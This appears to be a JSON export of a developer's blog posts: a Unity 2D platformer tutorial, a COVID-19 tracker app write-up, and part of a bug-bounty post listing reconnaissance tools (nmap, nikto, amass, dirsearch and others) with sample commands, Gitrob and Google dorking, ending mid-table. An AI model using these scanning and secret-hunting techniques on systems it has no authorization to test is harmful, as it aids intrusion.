device?</font></b><br></div></div><div><span style=\"font-size: large;\"><br></span></div><div><div style=\"\"><font size=\"4\">Forest Assassin is also available for Android devices and on the smartphone user will get the feelings of a classic platformer game. So please download the game and share your experience.</font></div><div style=\"\"><b style=\"color: rgb(221, 65, 36); font-size: large;\"><br></b></div><div style=\"\"><b style=\"font-size: large;\"><font color=\"#dd4124\" style=\"\"><font color=\"#dd4124\">&nbsp;<a href=\"https://play.google.com/store/apps/details?id=com.forestassassin\" style=\"\"><font color=\"#dd4124\">https://play.google.com/store/apps/details?id=com.forestassassin</font></a></font></font></b><br></div></div><div style=\"\"><b style=\"font-size: large;\"><font color=\"#dd4124\" style=\"\"><br></font></b></div><div style=\"\"><ul><li><font size=\"4\">To move use [ LEFT ] &amp; [ RIGHT ] arrow button</font><br></li><li><font size=\"4\">Use [ UP ] arrow button to jump<br></font></li><li><font size=\"4\">Use [ SWORD ] button to attack<br></font></li><li><font size=\"4\">To finish the game collect all coins and the trophy<br></font></li></ul><div><font size=\"4\"><br></font></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/Cm78Do9VO8s\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">How to built a 2D platformer game using Unity3d?</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">Unity3d game engine is a great platform to build a 2D or 3D game because it provides many major components such as physics, animation, cross-platform support and many more. 
Before starting to build any type of game, the very first thing you need to do is design a game theory, which means you need to build the idea behind the game; this will help you to develop a successful game. While designing a game theory, always remember to keep it simple and not make it complicated, otherwise it will be quite difficult for you to finish the game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">Consider the legendary <a href=\"http://www.trex-game.skipser.com/\"><font color=\"#dd4124\"><b>T-Rex Game</b></font></a>, which you often play in the Google Chrome browser when you don't have an internet connection. This game is the best example of a 2D platformer game, and if you look at it you will notice that it is very simple and easy to play: all you need to do is press the SPACE bar on the keyboard to avoid the obstacles and earn points.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">I followed a similar approach while designing this game. At the very beginning, my goal was to build a simple 2D platformer game so that any type of user can play and have fun, and so that it would also help me while building this game. 
My game theory is this: there is a king who hunts for the treasure, and during his mission he will face many enemies, with a 3-minute time limit to complete the game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">That's all the theory behind my game, and you should follow a similar approach while building your game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">So now let's discuss the tools and techniques behind the Forest Assassin game.</div></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">Tools &amp; Techniques</font></b></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">In every 2D platformer game, there are many components that we need to build to finish the game, and these components are the major elements of every platformer game.</div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\"><ul><li>Character Movement</li><li>Character Death</li><li>Character attack</li><li>Score Counter</li><li>Timer</li></ul></div><div style=\"font-size: large;\"><br></div><div style=\"font-size: large;\">So now let's discuss, one by one, how I have implemented all of these components in my game.</div><div style=\"font-size: large;\"><br></div><div style=\"\"><div style=\"\"><b style=\"\"><font size=\"5\">Character Movement</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To move a character in the game, you need a script that controls the character to walk, jump, crawl and so on, and it also requires physics.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To control the physics, Unity provides a component called <a href=\"https://docs.unity3d.com/ScriptReference/Rigidbody.html\"><font color=\"#dd4124\"><b>Rigidbody</b></font></a>, which handles a lot of 
fundamental physics such as force and acceleration; you can use this component with anything that you want to interact with the physics.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Lastly, it requires a floor on which the character can walk. In Unity this is called the Collider component, and many different types of collider are available, such as Box Collider, Circle Collider, etc.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">When you have all of these elements in place, you can move your character.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Character Death - (Game Over)</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">In this game, the character can only die when he touches the enemy or the water. To handle the trigger between colliders, Unity has an API called <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.OnTriggerEnter2D.html\"><font color=\"#dd4124\"><b>OnTriggerEnter2D(Collider2D trigger)</b></font></a>; when another collider enters the trigger, Unity calls it with that collider as the Collider2D parameter, which we can use to decide the death of our character.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To keep it organized,&nbsp;I have assigned a tag name called 'Enemy', so that if I add one more enemy in the future, all I need to do is assign this tag name to that component and it will be handled through the script.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Character attack</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Character attack is the most crucial element in every game because this is how you 
win the game. While building this component, there are two things you need to understand: first the animation, and second the attack script.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To make the <a href=\"https://docs.unity3d.com/Manual/AnimationSection.html\"><font color=\"#dd4124\"><b>animation</b></font></a> in 2D, you first need to gather all the <a href=\"https://docs.unity3d.com/Manual/Sprites.html\"><font color=\"#dd4124\"><b>sprites</b></font></a>, add them to the animation component and create your animation; later you can use it through the script.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">While writing the attack script, there are a few things we need to know, such as the attack range and the attack point, because the position from which the character sets his attack vector is quite important. In this game the sword is our attack vector, so when the character uses his sword to attack the enemy, we need to know the range and the point of the attack so that we can successfully launch our attack.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To calculate the attack range and point, Unity has an API called <a href=\"https://docs.unity3d.com/ScriptReference/Physics2D.OverlapCircleAll.html\"><font color=\"#dd4124\"><b>Physics2D.OverlapCircleAll</b></font></a>, which returns a list of colliders that fall within the circular area. Once we have all the colliders, all we need to do is start a loop and, within the loop, destroy the enemy game object.&nbsp;</font><span style=\"font-size: large;\">To give more clarity to our attack, I have created a blood </span><a href=\"https://docs.unity3d.com/ScriptReference/ParticleSystem.html\" style=\"font-size: large;\"><font color=\"#dd4124\"><b>particle system</b></font></a><span style=\"font-size: large;\"> which appears on every enemy death.</span></div><div 
style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Score Counter</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">If you understood the above two techniques (Character Death &amp; Character Attack), then implementing the scoring functionality is quite easy, as we need to follow a similar approach. When the character and a gold coin collide with each other, I increase the score by +10 through the script, and here again I am using the <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.OnTriggerEnter2D.html\"><font color=\"#dd4124\"><b>OnTriggerEnter2D(Collider2D trigger)</b></font></a> API.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To display the score in the game, I have used the <a href=\"https://docs.unity3d.com/2018.3/Documentation/ScriptReference/UI.Text.html\"><font color=\"#dd4124\"><b>Text UI</b></font></a> component, which comes under <a href=\"https://docs.unity3d.com/Packages/com.unity.ugui@1.0/api/UnityEngine.UI.html\"><font color=\"#dd4124\"><b>UnityEngine.UI</b></font></a>.&nbsp;</font><span style=\"font-size: large;\">The same scoring variable is used in all three components (You Win, Game Over &amp; Time's Up).</span></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Timer</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">To implement the timer functionality, Unity has an API called <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.StartCoroutine.html\"><font color=\"#dd4124\"><b>StartCoroutine</b></font></a>, which is used to create a parallel action that can pause its execution and then continue where it left off. Every coroutine function is declared with a return type of IEnumerator and uses the yield return statement.</font></div><div style=\"\"><font 
size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">In this game, I have set the timer to 3 minutes. As soon as the game starts, it starts the coroutine function and calculates the timer, and when the timer reaches zero it calls the <a href=\"https://docs.unity3d.com/ScriptReference/MonoBehaviour.StopCoroutine.html\"><font color=\"#dd4124\"><b>StopCoroutine</b></font></a> function.&nbsp;</font><span style=\"font-size: large;\">Again, I have used the Text UI component to display the time in the game.</span></div><div style=\"\"><br></div><div style=\"\"><b style=\"\"><font size=\"5\">How to publish for WebGL?</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Unity has a WebGL build option which allows publishing content as JavaScript&nbsp;programs; internally it uses HTML5/JavaScript, WebAssembly and WebGL rendering.&nbsp;</font><span style=\"font-size: large;\">Today's modern web browsers enable WebGL by default, which is quite helpful for running Unity WebGL applications in the browser.&nbsp;</span><span style=\"font-size: large;\">To run a WebGL application we need to serve it through a local server; in this game I have used Node.js as my server, but you can also use any other scripting language.</span></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><b style=\"\"><font size=\"5\">Open Source</font></b></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">I have made the complete development open-source on my <a href=\"https://github.com/anshumanpattnaik/unity-2d-forest-assassin-game\"><font color=\"#dd4124\"><b>GitHub</b></font></a>&nbsp;so that you will have a clear understanding of every component of this game, and I also hope it will give you an idea for building your own game.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">So this is the overall explanation of the Forest Assassin game. I hope you 
understood the tools and techniques behind this game. If you find any issues, please feel free to raise an issue on <a href=\"https://github.com/anshumanpattnaik/unity-2d-forest-assassin-game\"><font color=\"#dd4124\"><b>GitHub</b></font></a>.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Enjoy the game and also share this game with your friends.</font></div><div style=\"\"><font size=\"4\"><br></font></div><div style=\"\"><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div></div>",
            "visibility": true,
            "is_featured": false,
            "featured_board": false,
            "featured": ""
        },
        {
            "title": "Coronavirus (COVID-19) - Full Stack Application",
            "blog_id": "covid-19-full-stack-application",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-04-12T19:57:07.063617Z",
            "last_updated_date": "2021-06-06T10:46:59.617516Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/covid19-full-stack-application/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/covid19-full-stack-application/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/covid19-full-stack-application/large_thumbnail.png",
            "keywords": [
                "react.js",
                "node.js",
                "mongodb"
            ],
            "highlights": "Coronavirus (COVID-19) which is an infectious disease caused by respiratory illness and symptoms like flu, cough, fever, difficulty breathing, on December 31, 2019, the first case was recorded in Wuhan, China and later the virus got spread around the world and as of now, around 1 million+ confirmed cases are being recorded since then.",
            "description": "<font size=\"5\" style=\"\"><b>What is Coronavirus (COVID-19)?</b></font><div><font size=\"5\"><br></font></div><div><div><font size=\"4\">Coronavirus (COVID-19) which is an infectious disease caused by respiratory illness and symptoms like flu, cough, fever, difficulty breathing, on December 31, 2019, the first case was recorded in Wuhan, China and later the virus got spread around the world and as of now, around 1 million+ confirmed cases are being recorded since then.</font></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">You can protect yourself from this virus by following basic precautions like washing your hand frequently, avoid touching your face, maintaining a distance of (1 meter or 3 feet) between people and most importantly if you are sick then immediately call for medical help at your nearest hospital.</span><br></div></div><div><br></div><div><div class=\"video-responsive\">\n    <iframe width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/dth5jfLDuus\" frameborder=\"0\" allowfullscreen=\"\"></iframe></div></div><div><br></div><div><font size=\"5\"><b>How to build a full-stack application with interactive maps?</b></font><br></div><div><font size=\"5\"><br></font></div><div><div><font size=\"4\">In the current scenario, it's quite important to track the statistics of all the cases around the world constantly and thanks to <a href=\"https://github.com/CSSEGISandData/COVID-19\"><font color=\"#dd4124\">Johns Hopkins University Center for Systems Science and Engineering (JHU CSSE)</font></a> for providing the data to the public user, the data are quite well organized and sorted in very well manner and they are updating their repository every day.</font></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">So as I have collected the data now I have decided to build a <a href=\"https://covid19.hackbotone.com/\"><font 
color=\"#dd4124\">full-stack application</font></a> with interactive maps so that it is easier for users to track the cases across the globe.</span><br></div></div><div><span style=\"font-size: large;\"><br></span></div><div><font size=\"5\"><b>Node.js Backend Services</b></font><br></div><div><font size=\"5\"><br></font></div><div><div><font size=\"4\"><a href=\"https://github.com/CSSEGISandData/COVID-19\"><font color=\"#dd4124\">JHU CSSE</font></a> maintains the data in CSV format in their repository, and I need to convert the CSV data to JSON so that the front-end framework can populate the data efficiently. To convert CSV to JSON I have used the <a href=\"https://www.npmjs.com/package/csv-parser\"><font color=\"#dd4124\">csv-parser</font></a> npm module, which is a very popular CSV parser and converts CSV into JSON at a rate of around 90,000 rows per second.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">After parsing the data I store it in MongoDB so that the server doesn't parse the data every time; it only parses the data when new data is available.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">JHU CSSE updates the data once a day around 23:59 (UTC), and to synchronize the data on my server I am using the <a href=\"https://www.npmjs.com/package/node-cron\"><font color=\"#dd4124\">node-cron</font></a> npm module, which is a task scheduler: once you register a task with a given time, it runs in the background and triggers when the scheduled time is reached.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">In my case, the scheduled time is 23 hours 59 minutes, and when that time is reached it updates the data on my server.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Now, after parsing the data, the next big challenge is to populate all the coordinates on the map, because 
if I populate the coordinates the traditional way, the application will be much slower. The solution to this problem is <a href=\"https://geojson.org/\"><font color=\"#dd4124\">GeoJSON</font></a>, an open standard format for representing geographical features such as points, line strings and polygons. The format is based on JavaScript Object Notation and, most importantly, all the map platforms such as <a href=\"https://developers.google.com/maps/documentation\"><font color=\"#dd4124\">GoogleMap</font></a>, <a href=\"https://www.mapbox.com/\"><font color=\"#dd4124\">Mapbox</font></a> and many others support the GeoJSON format.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">So I have designed one endpoint, <a href=\"https://covid19-api.hackbotone.com/markers.geojson\" style=\"\"><font color=\"#dd4124\">/markers.geojson</font></a>, which takes its input from <a href=\"https://www.mongodb.com/\" style=\"\"><font color=\"#dd4124\">MongoDB</font></a> and prepares all the coordinates in GeoJSON format, so the front-end framework can call this endpoint while doing the map implementation.</font></div></div><div><font size=\"5\"><br></font></div><div><font size=\"5\" style=\"\"><b>React.js Frontend Services</b><br></font></div><div><font size=\"5\" style=\"\"><br></font></div><div><div><font size=\"4\">I have chosen <a href=\"https://reactjs.org/\"><font color=\"#dd4124\">react.js</font></a> as my front-end framework for this application, and to maintain the application state I have also implemented <a href=\"https://redux.js.org/\"><font color=\"#dd4124\">redux</font></a>, which is a very popular JavaScript library for managing application state. Both of these frameworks are quite efficient and easy to implement.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">To populate the coordinates on the map I have implemented Mapbox, which is quite similar to GoogleMap, but the major 
advantage of <a href=\"https://www.mapbox.com/\"><font color=\"#dd4124\">Mapbox</font></a> is that it's free and provides many better functionalities such as custom maps, clustering, etc.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">As I have already mentioned, Mapbox also supports the GeoJSON format. To populate GeoJSON data over the map, Mapbox has a technique called <a href=\"https://docs.mapbox.com/help/glossary/source-layer/\"><font color=\"#dd4124\">Source-Layer</font></a>, which is an individual layer of data within a vector source. <a href=\"https://docs.mapbox.com/mapbox-gl-js/style-spec/sources/\"><font color=\"#dd4124\">Sources</font></a> define which type of data the map should display (in this application the data type is 'geojson'), and after the data is defined, <a href=\"https://docs.mapbox.com/mapbox-gl-js/style-spec/layers/\"><font color=\"#dd4124\">Layers</font></a> refer to the source for the visual representation and styling of the map. In this way, I have populated all the coordinates on the map.</font></div></div><div><font size=\"5\" style=\"\"><br></font></div><div><font size=\"5\" style=\"\"><b>Open Source</b><br></font></div><div><font size=\"5\" style=\"\"><br></font></div><div><div><font size=\"4\">It would be quite difficult for me to walk you through every line of code step by step. That's why I made the complete development open-source on my GitHub. 
You can build similar types of applications by following this repository.</font></div><div><font size=\"4\"><br></font></div><div><ul><li><font size=\"4\">GitHub Link: <a href=\"https://github.com/anshumanpattnaik/covid19-full-stack-application\"><font color=\"#dd4124\">covid19-full-stack-application</font></a></font></li><li><span style=\"font-size: large;\">Website Link: <a href=\"https://covid19.hackbotone.com/\"><font color=\"#dd4124\">https://covid19.hackbotone.com/</font></a></span></li></ul></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">So this is the overall explanation of this website. I hope you understood the tools and techniques behind this application. If you find any issues, such as ways to improve the code, please feel free to raise an issue on GitHub, or reach out to me on <a href=\"https://twitter.com/anspattnaik\"><font color=\"#dd4124\">Twitter</font></a>; I'll be happy to answer your questions.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Please stay safe and stay well. I want to mention it again: to protect yourself from this virus, wear a mask, wash your hands frequently and take the necessary precautions if you get sick.</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Thank you &amp; Happy coding :)</font></div></div>",
            "visibility": true,
            "is_featured": true,
            "featured_board": true,
            "featured": "<div><font face=\"Lora, serif\" size=\"4\">The project work was highly appreciated by developer communities, got <a href=\"https://github.com/anshumanpattnaik/covid19-full-stack-application/stargazers\"><font color=\"#dd4124\">250+ GitHub stars</font></a> and was once featured on the JavaScript Trending board.</font></div><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><img src=\"https://assets.hackbotone.com/assets/github_achievement/Github%20Trending.PNG\"><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\"><br></font></div><div><font face=\"Lora, serif\" size=\"4\">I would like to thank everyone for appreciating my work.</font></div>"
        },
        {
            "title": "10 Recon Tools For Bug Bounty",
            "blog_id": "10-recon-tools-for-bug-bounty",
            "author": "Anshuman Pattnaik",
            "published_date": "2020-01-16T19:56:58.939409Z",
            "last_updated_date": "2021-07-28T17:08:48.055636Z",
            "seo_thumbnail": "https://assets.hackbotone.com/assets/top-10-recon-tools-for-bug-bounty/seo_thumbnail.png",
            "small_thumbnail": "https://assets.hackbotone.com/assets/top-10-recon-tools-for-bug-bounty/small_thumbnail.png",
            "thumbnail": "https://assets.hackbotone.com/assets/top-10-recon-tools-for-bug-bounty/large_thumbnail.png",
            "keywords": [
                "recon",
                "Bug Bounty",
                "Ethical Hacking"
            ],
            "highlights": "Information gathering is the most important stage of every penetration test: it gives you a better understanding of your target and the information (IP addresses, subdomains, open ports, etc.) needed to exploit vulnerabilities. To gather that information you need proper reconnaissance tools. Many recon tools are available on GitHub, and among them I found the top 10 recon tools that you can use to gather all of this information about your target.",
            "description": "<b><font size=\"5\">10 Recon Tools for Bug Bounty</font></b><div><b><font size=\"5\"><br></font></b></div><div><font size=\"4\">Information gathering is the most important stage of every penetration test: it gives you a better understanding of your target and the information (IP addresses, subdomains, open ports, etc.) needed to exploit vulnerabilities. To gather that information you need proper reconnaissance tools. Many recon tools are available on GitHub, and among them I found the top 10 recon tools that you can use to gather all of this information about your target.</font><br></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">Important Note</font></b><br></div><div><b style=\"\"><font size=\"5\"><br></font></b></div><div><font size=\"4\">Always remember that you must have proper authorization before scanning a target; never use these tools to scan targets you are not authorized to test. While you scan, the target's WAF (Web Application Firewall) monitors your network traffic and tracks your IP address, and if you scan a target without authorization you will violate the legal disclaimer of the application and could face legal action.</font><br></div><div><font size=\"4\"><br></font></div><div><b style=\"\"><font size=\"5\">1. Nmap</font></b><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">Nmap is a network mapper tool that is widely popular for discovering hosts and services on a network, and it's free and open-source on GitHub. It has many features, and after scanning a network you can gather a lot of important information through host discovery, service/version detection and OS detection. 
This tool is very useful and you can use all of this information to audit a network.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">nmap <span class=\"token operator\">-</span>v <span class=\"token operator\">-</span><span class=\"token constant\">A</span> scanme<span class=\"token punctuation\">.</span><span class=\"token property-access\">nmap</span><span class=\"token punctuation\">.</span><span class=\"token property-access\">org</span></code></pre></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://nmap.org/\"><font color=\"#dd4124\"><b>https://nmap.org/</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">2. Nikto</font></b><br></div><div><br></div><div><div><font size=\"4\">Nikto is a widely popular vulnerability scanner. It scans web servers to detect dangerous files, outdated server software and much more, and it performs specific server-type checks (Clickjacking, MIME Type, etc.). You can use it to scan any web server, such as Apache, NGINX, Oracle HTTP Server, etc. This tool is quite useful for detecting server misconfigurations. 
The major drawback of this tool is that it is quite easily detectable, so when scanning a network with Nikto it's better to use a VPN (Virtual Private Network).</font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">This tool is open-source on GitHub and can be installed on all major operating systems (Windows, macOS &amp; GNU/Linux).</font></div></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">nikto <span class=\"token operator\">-</span>h example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre></div><br></div><div><b style=\"font-size: large;\">For more information -&nbsp; </b><u style=\"color: rgb(221, 65, 36); font-size: large;\"><a href=\"https://cirt.net/Nikto2\"><font color=\"#dd4124\"><b>https://cirt.net/Nikto2</b></font></a></u></div><div><br></div><div><b><font size=\"5\">3. Amass</font></b><br></div><div><span style=\"font-size: large;\"><br></span></div><div><span style=\"font-size: large;\">Amass is developed and maintained by <a href=\"https://www2.owasp.org/\"><font color=\"#dd4124\"><b>OWASP</b></font></a> and is used to gather information through DNS enumeration, subdomain name alterations, web scraping, certificates, web APIs and many more. 
This tool was developed to help security researchers get in-depth information about a target network.</span></div><div><span style=\"font-size: large;\"><br></span></div><div><ul><li><font size=\"4\"><b>DNS:</b> Basic enumeration, Brute forcing (optional), Reverse DNS sweeping, Subdomain name alterations/permutations, Zone transfers (optional)</font></li><li><font size=\"4\"><b>Scraping:</b> Ask, Baidu, Bing, DNSDumpster, DNSTable, Dogpile, Exalead, Google, HackerOne, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ViewDNS, Yahoo<br></font></li><li><font size=\"4\"><b>Certificates:</b> Active pulls (optional), Censys, CertSpotter, Crtsh, Entrust, GoogleCT<br></font></li><li><font size=\"4\"><b>APIs:</b> AlienVault, BinaryEdge, BufferOver, CIRCL, CommonCrawl, DNSDB, GitHub, HackerTarget, IPToASN, Mnemonic, NetworksDB, PassiveTotal, Pastebin, RADb, Robtex, SecurityTrails, ShadowServer, Shodan, Spyse (CertDB &amp; FindSubdomains), Sublist3rAPI, TeamCymru, ThreatCrowd, Twitter, Umbrella, URLScan, VirusTotal, WhoisXML<br></font></li><li><font size=\"4\"><b>Web Archives:</b> ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback<br></font></li></ul><div><br></div></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">amass enum <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre></div><br></div><div><font size=\"4\"><b>For more information -</b> <a href=\"https://github.com/OWASP/Amass\"><font color=\"#dd4124\"><b>https://github.com/OWASP/Amass</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">4. Dirsearch</font></b><br></div><div><br></div><div><font size=\"4\">Dirsearch is a free and open-source tool that is widely popular for brute-forcing directories and files on websites. 
It has many features, such as multithreading, keep-alive connections, multiple extensions, report export in plain text and JSON, HTTP proxy support, User-agent randomization and many more. You can also use a custom wordlist such as SecLists to brute-force files and directories. This tool is user-friendly and easy to use, and it is supported on three major operating systems (Windows, macOS &amp; GNU/Linux).</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python dirsearch<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>u https<span class=\"token operator\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span> <span class=\"token operator\">-</span>e html<span class=\"token punctuation\">,</span>php<span class=\"token punctuation\">,</span>jsp<span class=\"token punctuation\">,</span>asp<span class=\"token punctuation\">,</span>json</code></pre></div><br></div><div><b><font size=\"5\">5. Sublist3r</font></b><br></div><div><br></div><div><font size=\"4\">Sublist3r is widely popular for enumerating the subdomains of a website. To gather subdomains it uses many popular search engines such as Google, Yahoo, Bing, Baidu and Ask, and it also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. 
This tool is very helpful for gathering the subdomains of a domain and, most importantly, to get better subdomain results, <a href=\"https://github.com/TheRook/subbrute\"><font color=\"#dd4124\"><b>subbrute</b></font></a> was integrated with Sublist3r with an improved wordlist.</font><br></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">python sublist3r<span class=\"token punctuation\">.</span><span class=\"token property-access\">py</span> <span class=\"token operator\">-</span>d example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre></div><br></div><div><font size=\"4\"><b>Sublist3r GitHub&nbsp;repo -</b> <a href=\"https://github.com/aboul3la/Sublist3r\"><font color=\"#dd4124\"><b>https://github.com/aboul3la/Sublist3r</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">6. Knockpy</font></b><br></div><div><br></div><div><font size=\"4\">Knockpy is designed to enumerate subdomains, to scan for DNS zone transfers and to automatically try to bypass wildcard DNS records. Most importantly, it supports queries to VirusTotal subdomains; to configure this, set up your API_KEY in the config.json file. 
Most of the penetration testers and bug hunters use this tool to exploit the subdomain takeover vulnerability.</font></div><div><br></div><div><div class=\"code-toolbar\"><pre class=\"  language-js\"><code class=\"  language-js\">knockpy example<span class=\"token punctuation\">.</span><span class=\"token property-access\">com</span></code></pre></div><br></div><div><font size=\"4\"><b>Knockpy GitHub&nbsp;repo -</b> <a href=\"https://github.com/guelfoweb/knock\"><font color=\"#dd4124\"><b>https://github.com/guelfoweb/knock</b></font></a></font><br></div><div><br></div><div><b><font size=\"5\">7. Gitrob</font></b><br></div><div><br></div><div><font size=\"4\">Gitrob is a widely popular tool for finding sensitive files in public GitHub repositories. It clones a user's or organization's public repositories, iterates in depth through the full commit history and flags files that match potentially sensitive patterns such as api_key, access_token, password, database_name, etc.<br></font></div><div><font size=\"4\"><br></font></div><div><font size=\"4\">To install this tool you need to have <a href=\"https://golang.org/\"><font color=\"#dd4124\"><b>Golang</b></font></a> set up on your local machine.</font><br></div><div><font size=\"4\"><br></font></div><div><font size=\"4\"><b>Gitrob GitHub repo -</b> <a href=\"https://github.com/michenriksen/gitrob\"><font color=\"#dd4124\"><b>https://github.com/michenriksen/gitrob</b></font></a></font><br></div><div><font size=\"4\"><br></font></div><div><b><font size=\"5\">8. Google Dork</font></b><br></div><div><b><font size=\"5\"><br></font></b></div><div><font style=\"\"><font size=\"4\">Google Dork, also known as \"Google Hacking\", is a technique for finding security holes in a website through Google search. 
It is very helpful for security researchers: using Google's web crawling you can gather information such as usernames, passwords and other sensitive information.</font><br></font></div><div><font style=\"\"><font size=\"4\"><br></font></font></div><div><font style=\"\"><font size=\"4\"><b>Google Dork Operators</b><br></font></font></div><div><font style=\"\"><font size=\"4\"><b><br></b></font></font></div><div><font style=\"\"><table cellpadding=\"0\" cellspacing=\"0\" class=\"blog_table\" style=\"font-family: &quot;Open Sans&quot;, sans-serif; font-size: 13.3333px;\"><tbody style=\"box-sizing: border-box;\"><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); border-right: 1px solid rgb(209, 209, 221); border-left: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_bold\" style=\"box-sizing: border-box; font-weight: 700; line-height: 1.7em; color: rgb(59, 58, 58);\"><font face=\"Lora, serif\" style=\"\" size=\"4\">Operators</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_bold\" style=\"box-sizing: border-box; font-weight: 700; line-height: 1.7em; color: rgb(59, 58, 58);\"><font face=\"Lora, serif\" size=\"4\">Purpose</font></span></td><td class=\"blog_table_no_left_border\" style=\"box-sizing: border-box; border-right: 1px solid rgb(209, 209, 221); border-top: 1px solid rgb(209, 209, 221); padding: 0.5em;\"><span class=\"blog_description_small_bold\" style=\"box-sizing: border-box; font-weight: 700; line-height: 1.7em; color: rgb(59, 58, 58);\"><font face=\"Lora, serif\" size=\"4\">Example</font></span></td></tr><tr style=\"box-sizing: border-box;\"><td class=\"blog_table_border\" style=\"box-sizing: border-box; border-top: 1px solid rgb(209, 209, 221); 
